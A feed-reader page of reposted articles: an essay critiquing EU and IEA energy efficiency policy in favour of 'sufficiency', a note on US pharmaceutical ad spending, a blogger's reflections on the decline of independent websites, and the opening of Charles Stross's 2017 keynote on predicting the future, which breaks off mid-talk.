Used to be small like a baby but grew to current size. Urban cyclist. Coffee Enthusiast. New media whore. Rabid atheist. Inventor of the sock.
152 stories
·
5 followers

Bedazzled by Energy Efficiency

1 Share

Bedazzled by energy efficiency illustration by diego marmolejo

To focus on energy efficiency is to make present ways of life non-negotiable. However, transforming present ways of life is key to mitigating climate change and decreasing our dependence on fossil fuels.

Energy efficiency policy

Energy efficiency is a cornerstone of policies to reduce carbon emissions and fossil fuel dependence in the industrialised world. For example, the European Union (EU) has set a target of achieving 20% energy savings through improvements in energy efficiency by 2020, and 30% by 2030. Measures to achieve these EU goals include mandatory energy efficiency certificates for buildings, minimum efficiency standards and labelling for a variety of products such as boilers, household appliances, lighting and televisions, and emissions performance standards for cars. [1]

The EU has the world’s most progressive energy efficiency policy, but similar measures are now applied in many other industrialised countries, including China. On a global scale, the International Energy Agency (IEA) asserts that “energy efficiency is the key to ensuring a safe, reliable, affordable and sustainable energy system for the future”. [2] In 2011, the organisation launched its 450 scenario, which aims to limit the concentration of CO2 in the atmosphere to 450 parts per million. Improved energy efficiency accounts for 71% of projected carbon reductions in the period to 2020, and 48% in the period to 2035. [2] [3]

What are the results?

Do improvements in energy efficiency actually lead to energy savings? At first sight, the advantages of efficiency seem to be impressive. For example, the energy efficiency of a range of domestic appliances covered by the EU directives has improved significantly over the last 15 years. Between 1998 and 2012, fridges and freezers became 75% more energy efficient, washing machines 63%, laundry dryers 72%, and dishwashers 50%. [4]

However, energy use in the EU-28 in 2015 was only slightly below the energy use in 2000 (1,627 Mtoe compared to 1.730 Mtoe, or million tonnes of oil equivalents). Furthermore, there are several other factors that may explain the (limited) decrease in energy use, like the 2007 economic crisis. Indeed, after decades of continuous growth, energy use in the EU decreased slightly between 2007 and 2014, only to go up again in 2015 and 2016 when economic growth returned. [1]

On a global level, energy use keeps rising at an average rate of 2.4% per year. [3] This is double the rate of population growth, while close to half of the global population has limited or no access to modern energy sources. [5] In industrialised (OECD) countries, energy use per head of the population doubled between 1960 and 2007. [6]

Rebound effects?

Why is it that advances in energy efficiency do not result in a reduction of energy demand? Most critics focus on so-called “rebound effects”, which have been described since the nineteenth century. [7] According to the rebound argument, improvements in energy efficiency often encourage greater use of the services which energy helps to provide. [8] For example, the advance of solid state lighting (LED), which is six times more energy efficient than old-fashioned incandescent lighting, has not led to a decrease in energy demand for lighting. Instead, it resulted in six times more light. [9]

In some cases, rebound effects may be sufficiently large to lead to an overall increase in energy use. [8] For example, the improved efficiency of microchips has accelerated the use of computers, whose total energy use now exceeds the total energy use of earlier generations of computers which had less energy efficient microchips. Energy efficiency advances in one product category can also lead to increased energy use in other product categories, or lead to the creation of an entirely new product category.

For example, LED-screens are more energy efficient than LCD-screens, and could therefore reduce the energy use of televisions. However, they also led to the arrival of digital billboards, which are enormous power hogs in spite of their energy efficient components. [10] Finally, money saved through improvements in energy efficiency can also be spent on other energy-intensive goods and services, which is a possibility usually referred to as an indirect rebound effect.

Beyond the rebound argument

Rebound effects are ignored by the EU and the IEA, and this might partly explain why the results fall short of the projections. Among academics, the magnitude of the rebound effect is hotly debated. While some argue that “rebound effects frequently offset or even eliminate the energy savings from improved efficiency” [3], others maintain that rebound effects “have become a distraction” because they are relatively small: “behavioural responses shave 5-30% of intended energy savings, reaching no more than 60% when combined with macro-economic effects – energy efficiency does save energy”. [11]

Those who downplay rebound effects attribute the lack of results to the fact that we don’t try hard enough: “many opportunities for improving energy efficiency still go wasted”. [11] Others are driven by the goal of improving energy efficiency policy. One response is to suggest that the frame of reference be expanded and that analysts should consider the efficiency not of individual products but of entire systems or societies. In this view, energy efficiency is not framed holistically enough, nor given sufficient context. [12] [13]

However, a few critics go one step further. In their view, energy efficiency policy cannot be fixed. The problem with energy efficiency, they argue, is that it establishes and reproduces ways of life that are not sustainable in the long run. [12][14]

A parellel universe

Rebound effects are often presented as “unintended” consequences, but they are the logical outcome of the abstraction that is required to define and measure energy efficiency. According to Loren Lutzenhiser, a researcher at Portland State University in the US, energy efficiency policy is so abstracted from the everyday dynamics of energy use that it operates in a “parallel universe”. [14] In a more recent paper, What is wrong with energy efficiency?, UK researcher Elizabeth Shove unravels this “parallel universe”, concluding that efficiency policies are “counter-productive” and “part of the problem”. [12]

According to some critics, efficiency policies are "counter-productive" and "part of the problem".

To start with, the parallel universe of energy efficiency interprets “energy savings” in a peculiar way. When the EU states that it will achieve 20% “energy savings” by 2020, “energy savings” are not defined as a reduction in actual energy consumption compared to present or historical figures. Indeed, such a definition would show that energy efficiency doesn’t reduce energy use at all. Instead, the “energy savings” are defined as reductions compared to the projected energy use in 2020. These reductions are measured by quantifying “avoided energy” – the energy resources not used because of advances in energy efficiency.

Even if the projected “energy savings” were to be fully realised, they would not result in an absolute reduction in energy demand. The EU argues that advances in energy efficiency will be “roughly equivalent to turning off 400 power stations”, but in reality no single power station will be turned off in 2020 because of advances in energy efficiency. Instead, the reasoning is that Europe would have needed to build an extra 400 power stations by 2020, were it not for the increases in energy efficiency.

In taking this approach, the EU treats energy efficiency as a fuel, “a source of energy in its own right”. [15] The IEA goes even further when it claims that “energy avoided by IEA member countries in 2010 (generated from investments over the preceding 1974 to 2010 period), was larger than actual demand met by any other supply side resource, including oil, gas, coal and electricity”, thus making energy efficiency “the largest or first fuel”. [16] [12]

Measuring something that doesn’t exist

Treating energy efficiency as a fuel and measuring its success in terms of “avoided energy” is pretty weird. For one thing, it is about not using a fuel that does not exist. [14] Furthermore, the higher the projected energy use in 2030, the larger the “avoided energy” would be. On the other hand, if the projected energy use in 2030 were to be lower than present-day energy use (we reduce energy demand), the “avoided energy” becomes negative.

An energy policy that seeks to reduce greenhouse gas emissions and fossil fuel dependency must measure its success in terms of lower fossil fuel consumption. [17] However, by measuring “avoided energy”, energy efficiency policy does exactly the opposite. Because projected energy use is higher than present energy use, energy efficiency policy takes for granted that total energy consumption will keep rising.

That other pillar of climate change policy – the decarbonisation of the energy supply by encouraging the use of renewable energy power plants – suffers from similar defects. Because the increase in total energy demand outpaces the growth in renewable energy, solar and wind power plants are in fact not decarbonising the energy supply. They are not replacing fossil fuel power plants, but are helping to accommodate the ever growing demand for energy. Only by introducing the concept of “avoided emissions” can renewables be presented as having something of the desired effect. [18]

What is it that is efficient?

In What is wrong with energy efficiency?, Elizabeth Shove demonstrates that the concept of energy efficiency is just as abstract as the concept of “avoided energy”. Efficiency is about delivering more services (heat, light, transportation,…) for the same energy input, or the same services for less energy input. Consequently, a first step in identifying improvements depends on specifying “service” (what is it that is efficient?) and on quantifying the amount of energy involved (how is “less energy” known?). Setting a reference against which “energy savings” are measured also involves specifying temporal boundaries (where does efficiency start and end?). [12]

Shove’s main argument is that setting temporal boundaries (where does efficiency start and end?) automatically specifies the “service” (what is it that is efficient?), and the other way around. That’s because energy efficiency can only be defined and measured if it is based on equivalence of service. Shove focuses on home heating, but her point is valid for all other technology. For example, in 1985, the average passenger plane used 8 litres of fuel to transport one passenger over a distance of 100 km, a figure that came down to 3.7 litres today.

Consequently, we are told that airplanes have become twice as efficient. However, if we make a comparison in fuel use between today and 1950, instead of 1985, airplanes do not use less energy at all. In the 1960s, propeller aircraft were replaced by jet aircraft, which are twice as fast but initially consumed twice as much fuel. Only fifty years later, the jet airplane became as “energy efficient” as the last propeller planes from the 1950s. [19]

If viewed in a larger historical context, the concept of energy efficiency completely disintegrates.

What then is a meaningful timespan over which to compare efficiencies? Should propeller planes be taken into account, or should they be ignored? The answer depends on the definition of equivalent service. If the service is defined as “flying”, then propeller planes should be included. But, if the energy service is defined as “flying at a speed of roughly 1,000 km/h”, we can discard propellers and focus on jet engines. However, the latter definition assumes a more energy-intensive service.

If we go back even further in time, for example to the early twentieth century, people didn’t fly at all and there’s no sense in comparing fuel use per passenger per kilometre. Similar observations can be made for many other technologies or services that have become “more energy efficient”. If they are viewed in a larger historical context, the concept of energy efficiency completely disintegrates because the services are not at all equivalent.

Often, it’s not necessary to go back very far to prove this. For example, when the energy efficiency of smartphones is calculated, the earlier generation of much less energy demanding “dumbphones” is not taken into account, although they were common less than a decade ago.

How efficient is a clothesline?

Because of the need to compare 'like with like' and establish equivalent of service, energy efficiency policy ignores many low energy alternatives that often have a long history but are still relevant in the context of climate change.

For example, the EU has calculated that energy labels for tumble driers will be able to “save up to 3.3 Twh of electricity by 2020, equivalent to the annual energy consumption of Malta”. [20]. But how much energy use would be avoided if by 2020 every European would use a clothesline instead of a tumble drier? Don’t ask the EU, because it has not calculated the avoided energy use of clotheslines.

Clothesline by diego marmolejo

Neither do the EU or the IEA measure the energy efficiency and avoided energy of bicycles, hand powered drills, or thermal underwear. Nevertheless, if clotheslines would be taken seriously as an alternative, then the projected 3.3 TWh of energy “saved” by more energy efficient tumble driers can no longer be considered “avoided energy”, let alone a fuel. In a similar way, bicycles and clothing undermine the very idea of calculating the “avoided energy” of more energy efficient cars and central heating boilers.

Unsustainable concepts of service

The problem with energy efficiency policies, then, is that they are very effective in reproducing and stabilising essentially unsustainable concepts of service. [12] Measuring the energy efficiency of cars and tumble driers, but not of bicycles and clotheslines, makes fast but energy-intensive ways of travel or clothes drying non-negotiable, and marginalises much more sustainable alternatives. According to Shove:

“Programmes of energy efficiency are politically uncontroversial precisely because they take current interpretations of ‘service’ for granted… The unreflexive pursuit of efficiency is problematic not because it doesn’t work or because the benefits are absorbed elsewhere, as the rebound effect suggests, but because it does work – via the necessary concept of equivalence of services – to sustain, perhaps escalate, but never undermine… increasingly energy intensive ways of life.” [12]

Indeed, the concept of energy efficiency easily accommodates further growth of energy services. All future novelties can be subjected to an efficiency approach. For example, if patio heaters and monsoon showers become “normal”, they could be incorporated in existing energy efficiency policy – and when that happens, the problem of their energy use is considered to be under control. At the same time, defining, measuring and comparing the efficiency of patio heaters and monsoon showers helps make them more “normal”. As a bonus, adding new products to the mix will only increase the energy use that is “avoided” through energy efficiency.

In short, neither the EU nor the IEA capture the “avoided energy” generated by doing things differently, or by not doing them at all – while these arguably have the largest potential to reduce energy demand. [12] Since the start of the Industrial Revolution, there has been a massive expansion in the uses of energy and in the delegation of human to mechanical forms of power. But although these trends are driving the continuing increase in energy demand, they cannot be measured through the concept of energy efficiency.

As Shove demonstrates, this problem cannot be solved, because energy efficiency can only be measured on the basis of equivalent service. Instead, she argues that the challenge is “to debate and extend meanings of service and explicitly engage with the ways in which these evolve”. [12]

Towards an energy inefficiency policy?

There are several ways to escape from the parallel universe of energy efficiency. First, while energy efficiency hinders significant long term reduction in energy demand through the need for equivalence of service, the opposite also holds true – making everything less energy efficient would reverse the growth in energy services and reduce energy demand.

For example, if we were to install 1960s internal combustion engines into modern SUVs, fuel use per kilometre driven would be much higher than it is today. Few people would be able or willing to afford to drive such cars, and they would have no other choice but to switch to a much lighter, smaller and less powerful vehicle, or to drive less.

Making everything less energy efficient would reverse the growth in energy services and reduce energy demand.

Likewise, if an “energy inefficiency policy” were to mandate the use of inefficient central heating boilers, heating large homes to present-day comfort standards would be unaffordable for most people. They would be forced to find alternative solutions to achieve thermal comfort, for instance heating only one room, dressing more warmly, using personal heating devices, or moving to a smaller home.

Recent research into the heating of buildings confirms that inefficiency can save energy. A German study examined the calculated energy performance ratings of 3,400 homes and compared these with the actual measured consumption. [21] In line with the rebound argument, the researchers found that residents of the most energy efficient homes (75 kWh/m2/yr) use on average 30% more energy than the calculated rating. However, for less energy efficient homes, the opposite – “pre-bound” – effect was observed: people use less energy than the models had calculated, and the more inefficient the dwelling is, the larger this gap becomes. In the most energy inefficient dwellings (500 kWh/m2/yr), energy use was 60% below the predicted level.

From efficiency to sufficiency?

However, while abandoning – or reversing – energy efficiency policy would arguably bring more energy savings than continuing it, there is another option that’s more attractive and could bring even larger energy savings. For an effective policy approach, efficiency can be complemented by or perhaps woven into a “sufficiency” strategy. Energy efficiency aims to increase the ratio of service output to energy input while holding the output at least constant. Energy sufficiency, by contrast, is a strategy that aims to reduce the growth in energy services. [4] In essence, this is a return to the “conservation” policies of the 1970s. [14]

Sufficiency can involve a reduction of services (less light, less travelling, less speed, lower indoor temperatures, smaller houses), or a substitution of services (a bicycle instead of a car, a clothesline instead of a tumble drier, thermal underclothing instead of central heating). Unlike energy efficiency, the policy objectives of sufficiency cannot be expressed in relative variables (like kWh/m2/year). Instead, the focus is on absolute variables, such as reductions in carbon emissions, fossil fuel use, or oil imports. [17] Unlike energy efficiency, sufficiency cannot be defined and measured by examining a single product type, because sufficiency can involve various forms of substitution. [22] Instead, a sufficiency policy is defined and measured by looking at what people actually do.

A sufficiency policy could be developed without a parallel efficiency policy, but combining them could bring larger energy savings. The key step here is to think of energy efficiency as a means rather than an end in itself, argues Shove. [12] For example, imagine how much energy could be saved if we would use an energy efficient boiler to heat just one room to 16 degrees, if we install an energy efficient engine in a much lighter vehicle, or if we combine an energy saving shower design with fewer and shorter showers. Nevertheless, while energy efficiency is considered to be a win-win strategy, to develop the concept of sufficiency as a significant force in policy is to make normative judgments: so much consumption is enough, so much is too much. [23] This is sure to be controversial, and it risks being authoritarian, at least as long as there is a cheap supply of fossil fuels.

Kris De Decker

Illustrations by Diego Marmolejo.


References

[1] "Energy Efficiency", European Commission. https://ec.europa.eu/energy/en/topics/energy-efficiency

[2] "Energy Efficiency", International Energy Association (IEA). https://www.iea.org/topics/energyefficiency/

[3] Sorrell, Steve. "Reducing energy demand: A review of issues, challenges and approaches." Renewable and Sustainable Energy Reviews 47 (2015): 74-82. http://www.sciencedirect.com/science/article/pii/S1364032115001471

[4] Brischke, Lars-Arvid, et al. Energy sufficiency in private households enabled by adequate appliances. Wuppertal Institut für Klima, Umwelt, Energie, 2015. https://epub.wupperinst.org/frontdoor/deliver/index/docId/5932/file/5932_Brischke.pdf

[5] "Poor people's Energy Outlook 2016", Practical Action, 2016. https://policy.practicalaction.org/policy-themes/energy/poor-peoples-energy-outlook/poor-people-s-energy-outlook-2016

[6] "Energy use (kg of oil equivalent per capita)", World Bank, 2014. https://data.worldbank.org/indicator/EG.USE.PCAP.KG.OE

[7] Alcott, Blake. "Jevons' paradox." Ecological economics 54.1 (2005): 9-21. https://pdfs.semanticscholar.org/f247/b8fae38e0c46bb9d1020b0be0d589db28446.pdf

[8] Sorrell, Steve. "The Rebound Effect: an assessment of the evidence for economy-wide energy savings from improved energy efficiency." (2007). http://ukerc.rl.ac.uk/UCAT/PUBLICATIONS/The_Rebound_Effect_An_Assessment_of_the_Evidence_for_Economy-wide_Energy_Savings_from_Improved_Energy_Efficiency.pdf

[9] Kyba, Christopher CM, et al. "Artificially lit surface of Earth at night increasing in radiance and extent." Science advances 3.11 (2017): e1701528. http://advances.sciencemag.org/content/3/11/e1701528.full?intcmp=trendmd-adv; Tsao, Jeffrey Y., et al. "Solid-state lighting: an energy-economics perspective." Journal of Physics D: Applied Physics 43.35 (2010): 354001. http://siteresources.worldbank.org/INTEAER/Resources/Sao.Simmons.pdf

[10] Young, Gregory. "Illuminating the Issues." (2013). http://www.scenic.org/storage/documents/Digital_Signage_Final_Dec_14_2010.pdf

[11] Gillingham, Kenneth, et al. "Energy policy: The rebound effect is overplayed." Nature 493.7433 (2013): 475-476. http://environment.yale.edu/kotchen/pubs/rebound.pdf

[12] Shove, Elizabeth. "What is wrong with energy efficiency?." Building Research & Information (2017): 1-11. http://www.tandfonline.com/doi/full/10.1080/09613218.2017.1361746

[13] Calwell, Is efficient sufficient? Report for the European Council for an Energy Efficient Economy. http://www.eceee.org/static/media/uploads/site-2/policy-areas/sufficiency/eceee_Progressive_Efficiency.pdf

[14] Lutzenhiser, Loren. "Through the energy efficiency looking glass." Energy Research & Social Science 1 (2014): 141-151. http://www.sciencedirect.com/science/article/pii/S2214629614000255

[15] Good Practice in Energy Efficiency: for a sustainable, safer and more competitive Europe. European Commission, 2017.

[16] Capturing the Multiple Benefits of Energy Efficiency. IEA, 2014. https://www.iea.org/Textbase/npsum/MultipleBenefits2014SUM.pdf

[17] Harris, Jeffrey, et al. "Towards a sustainable energy balance: progressive efficiency and the return of energy conservation." Energy efficiency 1.3 (2008): 175-188. https://pubarchive.lbl.gov/islandora/object/ir%3A150324/datastream/PDF/view

[18] How (not) to resolve the energy crisis, Low-tech Magazine, Kris De Decker, 2009. http://www.lowtechmagazine.com/2009/11/renewable-energy-is-not-enough.html

[19] Peeters, Paul, J. Middel, and A. Hoolhorst. "Fuel efficiency of commercial aircraft." An overview of historical and future trends (2005). https://www.transportenvironment.org/publications/fuel-efficiency-commercial-aircraft-overview-historical-and-future-trends

[20] Household Tumble Driers, European Commission. https://ec.europa.eu/energy/en/topics/energy-efficiency/energy-efficient-products/household-tumble-driers

[21] Sunikka-Blank, Minna, and Ray Galvin. "Introducing the prebound effect: the gap between performance and actual energy consumption." Building Research & Information 40.3 (2012): 260-273. http://www.tandfonline.com/doi/full/10.1080/09613218.2012.690952

[22] Thomas, Stefan, et al. Energy sufficiency policy: an evolution of energy efficiency policy or radically new approaches?. Wuppertal Institut für Klima, Umwelt, Energie, 2015. https://epub.wupperinst.org/frontdoor/deliver/index/docId/5922/file/5922_Thomas.pdf

[23] Darby, Sarah. "Enough is as good as a feast–sufficiency as policy." Proceedings, European Council for an Energy-Efficient Economy. La Colle sur Loup, 2007. https://pdfs.semanticscholar.org/8e68/c68ace130104ef6fc0f736339ff34b253509.pdf


Read the whole story
onepointzero
6 days ago
reply
Brussels, Belgium
Share this story
Delete

Pharmaceutical Ads in the U.S.

1 Comment

From Harper’s Index for January:

Amount the US pharmaceutical industry spent in 2016 on ads for prescription drugs: $6,400,000,000

Number of countries in which direct-to-consumer pharmaceutical ads are legal: 2

Link: harpers.org/archive/2018/01/harpers-index-401/

Read the whole story
onepointzero
7 days ago
reply
It always surprises me when I go to the USA and see tv ads for pharmaceuticals. Their packaging is also wilder – made to sell – vs the neutral style they have here in Europe.
Brussels, Belgium
Share this story
Delete

You Get What You Get

1 Comment

Stay with me. This isn't my typical link-post. It's also long so if you don't care about the web or independent writing, here's a nice article about genealogy and statistics.

Two recent articles by Jason Kottke mesh nicely with something that has been weighing on me for the past couple of years. Let's set the context though. I think kottke.org is a wonderful site and I read every article he publishes on his RSS feed. Jason is an originator in the type of Internet content I love. But kottke.org is struggling along with every other site that respects people as more than a monetization model.

Jason on the new membership model:

From a business perspective, it’s an understatement to say that it’s been a bit unnerving seeing 10 years of steadily growing revenue being replaced by something else entirely. I’ve been trying (and failing) to come up with a metaphor to explain it...the site is exactly the same, the revenue is in the same ballpark as before, but the financing is completely different.

I've considered the membership model for Macdrifter but I'm not sure I'd like the obligations that come with most memberships. Bonuses like special newsletters and access restrictions always seem like the opposite of web-publishing. It's nice to see that Jason is making a simple membership sustainable.

Even with new business models, I think that the idea of people regularly reading the same websites as part of their daily routine is a hobby left to old people like me. To be relevant we all need to accept that the open web is not going to exist much longer and certainly isn't important in a way that the average person understands. Adapt or languish.1

Jason, again:

But I’ve also been thinking a lot about how the information published here is delivered. I love the web and websites and believe the blog format is the best for the type of thing I want to communicate. But fewer and fewer people actually go to websites. I largely don’t. You can follow kottke.org on Facebook, Twitter, Tumblr, Pinterest, and via RSS, but fewer people are using newsreaders and Facebook et al are trying their best to decrease visibility of sites like mine unless I pay up or constantly publish.

It's right to complain and lament. Those were rich and vibrant times on the web. But no one wants to be arranging blog posts on the Titanic. Everything changes.

I loved when blogs were conversations between different people. Person "A" writes something. Person "B" writes a reply on their own site and links to person "A." The web was made of threads and it was rich and varied and wonderful. But it wasn't profitable and it was hard work to create and follow. It took guts and time. It was before Facebook made the internet a comment thread.

I think Kamer (and to a lesser degree Kottke) are wrong on this point:

We blame Walmart for decimating small businesses, but ultimately, small town shoppers chose convenience and lower prices over the more local and diverse offerings from their neighbors. And for the past several years, readers have been doing the same thing in favoring Facebook. What Kamer is arguing is that readers who value good journalism, good writing, and diverse viewpoints need to push back against the likes of the increasingly powerful and monolithic Facebook...and visiting individual websites is one way to do that.

It's arguing against capitalism, tribalism, and all other types of human nature. We can complain about Facebook and Twitter (as I regularly do) but we can't negotiate a treaty with their users. There will be consequences of Facebook and Twitter but if humans are experts at anything, it's misidentifying consequences. We still don't even understand what killed newspapers.

Advertising on Macdrifter stopped being fun for me several years ago. I never did anything popular enough to be on The Deck so I did most of my ads by hand. At one time I produced lengthy product walk-throughs as an alternative to just running an ad.2 It paid me a bit of money but it also helped out products that I like. There's no future in ads if you care about the people at the other end of them. Chronic internet users are calloused and immune to most ads. Everything seems like a scam so it's hard to trust anyone. Ads have become malware that publishers foist on readers for a few pennies. The arms-race of ads and ad blockers is just starting and it will be expensive to keep up.

Back to our main character, Jason Kottke. The plot thickens as we see our hero take a foreshadowed turn:

The newsletter is very much a work in progress and a departure from the way I usually do things around here. For one thing, it’s a collaboration…almost everything else I’ve done on the site was just me. We’ve previewed it over the last two weeks just for members, but it’s still more “unfinished” than I’m comfortable with. The design hasn’t been nailed down, the logo will likely change, and Tim & I are still trying to figure out the voice and length. But launching it unfinished feels right…we aren’t wasting time on optimization and there’s more opportunity to experiment and move toward what works as time goes on. We hope you’ll join us by subscribing and letting us know your thoughts and feedback as we get this thing moving.

As much as I am a fan of email as a self-documenting form of asynchronous communication, I'll be honest: I don't understand the popularity of newsletters. I do not enjoy reading in email. I do not like leisure mixed into work. I do not like the options I have for mobile access. I do not like more things coming into my inbox that need to be managed. It's just not for me.

It's interesting to see how the final few fish struggle for their existence in the pond. Some are choosing to evolve and branch out. To do more work, not less. Others, like me, are just biding time until death takes us off of the DNS for good.

So much of what I enjoy reading is gone. Most of the friends I made over the years have given up the ghost on their blogs. Those that continue to scratch out the rare post here and there do so with less humor and less excitement. The generally benign group of sites left to write about the random weirdness of the world makes me feel less curious. When I search for answers on the internet most of the truly interesting stuff are hits from blogs that stopped publishing in 2014.

So there you go. I write less on Macdrifter because it's depressing. To all of those people that take the time to write in and ask questions or suggest topics, I really like you. You are all oddballs. You're all my people and you're why I keep going with this dumb project.

I automatically collect server stats but in the most rudimentary way possible.3 I've been collecting them since 2011 and the historic perspective is heartening. The numbers haven't declined even though my posting has. I don't put much weight on these stats. I haven't looked at them in over a year.

Stats

I read these as a trend not a precise number. I've basically found my niche. I've posted over 3000 articles since 2006. That breadcrumb trail has lured a consistent number of readers that seem to like what I make.

Now let's have a series of self-serving questions to answer. Readers love that.

Why do it then?

That's a great question. Thanks for asking it. I asked myself this question a long time ago. I also asked a bunch of other bloggers this question too. Some answered and some didn't. But it colors how I see everything on the internet now. Why is this person writing this article? Why are they making a podcast? What do they get out of it?

I post to Macdrifter because it makes people notice me and that attention has provided both casual and real friendships. It gives me a ticket to some awkward party that everyone pretends they don't care about but still loves.

I also write because it gives me an outlet for thinking more deeply. In contrast to podcasting, writing is deliberate and methodical and gives me time to consider ideas more completely. Podcasting is fun but because it's fleeting and not yet searchable there's very little long-term consequences for lazy thinking. I love podcasts, A LOT, but it makes most smart people dumber whereas blogging seems to hone them.

The last reason for blogging is also self serving. It's one of the best ways I can think of to help developers that make things I like. The AppStore is terrible. Reviews are broken. Editor picks seem to be thoughtless. I buy apps used by people I respect. I usually don't care what "coolkid369" thinks about something on the AppStore. But if Merlin Mann uses an app, you can be damn well be sure I'll buy it. I'll tell everyone I know, then that app has a better chance of making it long term. The developer wins and I win. Hakuna Matata.

So what now?

Another great question. You're on a roll. Macdrifter loses money. I pay for the domain, hosting, and every app I review.4 That kind of stinks. The consequence is that I don't review as many apps or products because it's a waste of my money. But, I also don't want to run ads. The only real option is reader support. Without direct reader support I just don't have the motivation to do much here. That's the truth. Now you know.

What's going to happen?

Have you not learned anything? I'm very unmotivated but I'm also meticulous in my research. Nothing is going to change immediately. I will continue to post to Macdrifter and Hobo Signs while I figure out the sponsorship model and the technical implementation. If membership works and you don't subscribe then you'll just notice an increase in publishing at Macdrifter and maybe a small pain of guilt in your darkest of hearts.

Here's what I'm thinking:

I'll probably use Patreon for membership processing and member communication.

I like the format Dave Winer is using at Scripting.com. It's informal and stream-like. I don't like the actual news-stream format he has but I like his chatty posting style.

I also like to solve problems and share solutions so I'll need some method of communicating that's better than email. I also don't want to moderate a community.

I like RSS so I need a membership feed.

I don't like DRM but, like door locks, a minimum amount of effort helps keep honest people honest. This means that a feed will need to be member-only but still work with all RSS readers.

The membership should be monthly and relatively inexpensive because I know I have subscription exhaustion myself.

You Get What You Get and Don't Get Upset

The web has changed. It's not what I had hoped for, but here it is. It's the web we have.

References

You’re Descended From Royalty and So Is Everybody Else

Home of Fine Hypertext Products

kottke.org Memberships, an Update One Year Later

Support kottke.org With a Membership

In Tech and Media, You Can’t Remain Neutral on a Moving Train

Stop Using Facebook and Start Using Your Browser

Saving the Free Press From Private Equity

iThoughts Is the Premier Mind Mapping Software for Mac and iOS [Sponsor]

Casper’s war on mattress bloggers

Ad Targeters Are Pulling Data From Your Browser’s Password Manager

Noticing, a New Weekly Newsletter From kottke.org

Free Real-Time Logfile Analyzer to Get Advanced Statistics (GNU GPL).

Asking Why

Hobo Signs

It's Even Worse Than It Appears.

You Get What You Get


  1. Yes, I'm very cynical about the future of the internet. I was cynical when Facebook wanted to get into publishing. I was cynical when Twitter said it would block hate groups. I was cynical when republicans took over the FCC. I've seen very few positive changes on the internet in the past five years that would make me optimistic. 

  2. These were actually fun to make but they were a huge amount of work. I'd wager that my hourly rate for these ads was about $10 which is not a good business to be in if you like money and things. 

  3. I got rid of Google stats long ago because it was slowing down the page loading and I also try to avoid Google whenever it's within my control. 

  4. This is still my biggest pet peeve of sites that review apps. Not paying for app out of your own bank account means value is never really a part of the assessment. We can pretend it is for the sake of a good narrative but if you didn't pay the $50 that app costs then you really can't feel the sacrifice a reader feels when they choose between a bunch of similarly priced apps. Say that up front. Say that the app didn't cost you anything and that your review doesn't take the cost into consideration. 

Read the whole story
onepointzero
7 days ago
reply
The rise of the content silos is depressing.
Brussels, Belgium
Share this story
Delete

Dude, you broke the future!

2 Comments and 12 Shares

This is the text of my keynote speech at the 34th Chaos Communication Congress in Leipzig, December 2017.

(You can also watch it on YouTube, but it runs to about 45 minutes.)




Abstract: We're living in yesterday's future, and it's nothing like the speculations of our authors and film/TV producers. As a working science fiction novelist, I take a professional interest in how we get predictions about the future wrong, and why, so that I can avoid repeating the same mistakes. Science fiction is written by people embedded within a society with expectations and political assumptions that bias us towards looking at the shiny surface of new technologies rather than asking how human beings will use them, and to taking narratives of progress at face value rather than asking what hidden agenda they serve.

In this talk, author Charles Stross will give a rambling, discursive, and angry tour of what went wrong with the 21st century, why we didn't see it coming, where we can expect it to go next, and a few suggestions for what to do about it if we don't like it.




Good morning. I'm Charlie Stross, and it's my job to tell lies for money. Or rather, I write science fiction, much of it about our near future, which has in recent years become ridiculously hard to predict.

Our species, Homo Sapiens Sapiens, is roughly three hundred thousand years old. (Recent discoveries pushed back the date of our earliest remains that far, we may be even older.) For all but the last three centuries of that span, predicting the future was easy: natural disasters aside, everyday life in fifty years time would resemble everyday life fifty years ago.

Let that sink in for a moment: for 99.9% of human existence, the future was static. Then something happened, and the future began to change, increasingly rapidly, until we get to the present day when things are moving so fast that it's barely possible to anticipate trends from month to month.

As an eminent computer scientist once remarked, computer science is no more about computers than astronomy is about building telescopes. The same can be said of my field of work, written science fiction. Scifi is seldom about science—and even more rarely about predicting the future. But sometimes we dabble in futurism, and lately it's gotten very difficult.

How to predict the near future

When I write a near-future work of fiction, one set, say, a decade hence, there used to be a recipe that worked eerily well. Simply put, 90% of the next decade's stuff is already here today. Buildings are designed to last many years. Automobiles have a design life of about a decade, so half the cars on the road will probably still be around in 2027. People ... there will be new faces, aged ten and under, and some older people will have died, but most adults will still be around, albeit older and grayer. This is the 90% of the near future that's already here.

After the already-here 90%, another 9% of the future a decade hence used to be easily predictable. You look at trends dictated by physical limits, such as Moore's Law, and you look at Intel's road map, and you use a bit of creative extrapolation, and you won't go too far wrong. If I predict that in 2027 LTE cellular phones will be everywhere, 5G will be available for high bandwidth applications, and fallback to satellite data service will be available at a price, you won't laugh at me. It's not like I'm predicting that airliners will fly slower and Nazis will take over the United States, is it?

And therein lies the problem: it's the 1% of unknown unknowns that throws off all calculations. As it happens, airliners today are slower than they were in the 1970s, and don't get me started about Nazis. Nobody in 2007 was expecting a Nazi revival in 2017, right? (Only this time round Germans get to be the good guys.)

My recipe for fiction set ten years in the future used to be 90% already-here, 9% not-here-yet but predictable, and 1% who-ordered-that. But unfortunately the ratios have changed. I think we're now down to maybe 80% already-here—climate change takes a huge toll on infrastructure—then 15% not-here-yet but predictable, and a whopping 5% of utterly unpredictable deep craziness.

Ruling out the singularity

Some of you might assume that, as the author of books like "Singularity Sky" and "Accelerando", I attribute this to an impending technological singularity, to our development of self-improving artificial intelligence and mind uploading and the whole wish-list of transhumanist aspirations promoted by the likes of Ray Kurzweil. Unfortunately this isn't the case. I think transhumanism is a warmed-over Christian heresy. While its adherents tend to be vehement atheists, they can't quite escape from the history that gave rise to our current western civilization. Many of you are familiar with design patterns, an approach to software engineering that focusses on abstraction and simplification in order to promote reusable code. When you look at the AI singularity as a narrative, and identify the numerous places in the story where the phrase "... and then a miracle happens" occurs, it becomes apparent pretty quickly that they've reinvented Christianity.

Indeed, the wellsprings of today's transhumanists draw on a long, rich history of Russian Cosmist philosophy exemplified by the Russian Orthodox theologian Nikolai Fyodorvitch Federov, by way of his disciple Konstantin Tsiolkovsky, whose derivation of the rocket equation makes him essentially the father of modern spaceflight. And once you start probing the nether regions of transhumanist thought and run into concepts like Roko's Basilisk—by the way, any of you who didn't know about the Basilisk before are now doomed to an eternity in AI hell—you realize they've mangled it to match some of the nastiest ideas in Presybterian Protestantism.

